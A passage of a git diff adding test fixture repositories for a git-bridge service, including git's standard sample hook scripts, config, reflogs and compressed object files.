tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index new file mode 100644 index 0000000..8fb7e1e Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD new file mode 100644 index 0000000..ac406aa --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/HEAD @@ -0,0 +1,3 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file +71ebe5d70c8634f7531cc09c1cad5dae951a9052 fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 Winston Li <git@winston.li> 1475938853 +0100 commit: Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..ac406aa --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/logs/refs/heads/master @@ -0,0 +1,3 @@ +0000000000000000000000000000000000000000 4a64431a59519ff25eff2cd94a561081146059b7 Winston Li <git@winston.li> 1475933347 +0100 commit (initial): Initial commit +4a64431a59519ff25eff2cd94a561081146059b7 71ebe5d70c8634f7531cc09c1cad5dae951a9052 Winston Li <git@winston.li> 1475933399 +0100 commit: Add ignored file +71ebe5d70c8634f7531cc09c1cad5dae951a9052 fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 Winston Li <git@winston.li> 1475938853 +0100 commit: Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a new file mode 100644 index 0000000..72a979b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/23/462c896684e004db23cfab16255e176400643a differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 new file mode 100644 index 0000000..fddf852 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/39/2f03252185fe21cb8926676deb84b60a617ff9 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 new file mode 100644 index 0000000..f58821d --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/4a/64431a59519ff25eff2cd94a561081146059b7 @@ -0,0 +1,3 @@ +x +!>܃pt";i *l~>A,,w +6qk`!"OÔI'BZT-ϱKF+rl}8yFUͤԥpa 6> \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 new file mode 100644 index 0000000..e7279a2 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/55/45880406d44a71c1c179cb17a5819b59cbbc36 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 new file mode 100644 index 0000000..5678b62 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/71/ebe5d70c8634f7531cc09c1cad5dae951a9052 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 new file mode 100644 index 0000000..7112238 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 new file mode 100644 index 0000000..17bca03 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f5/b2fc4665b50e85c1b66594166f218f722a4af2 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 new file mode 100644 index 0000000..e693a1b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/f9/8c2cd38c5fae9c349214f6835f5b4aaa622216 differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 new file mode 100644 index 0000000..3196837 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/objects/fe/5adb3985be3ef5e790eaf9b1b41f862d64dfc1 @@ -0,0 +1 @@ +x;0D}푐도-=fmK$FPN1opAkKPb`B9Q+[\0XpDʉ'-yU2&/98cGedŔ0T%jA~o mkXã@YфRI)'5qN `ݨܖ,NF \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master new file mode 100644 index 0000000..5fb1c33 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/refs/heads/master @@ -0,0 +1 @@ +fe5adb3985be3ef5e790eaf9b1b41f862d64dfc1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.ignored b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.ignored new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore new file mode 100644 index 0000000..5545880 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/.gitignore @@ -0,0 +1,2 @@ +*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..217e7d6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Add ignored file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/incoming/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" 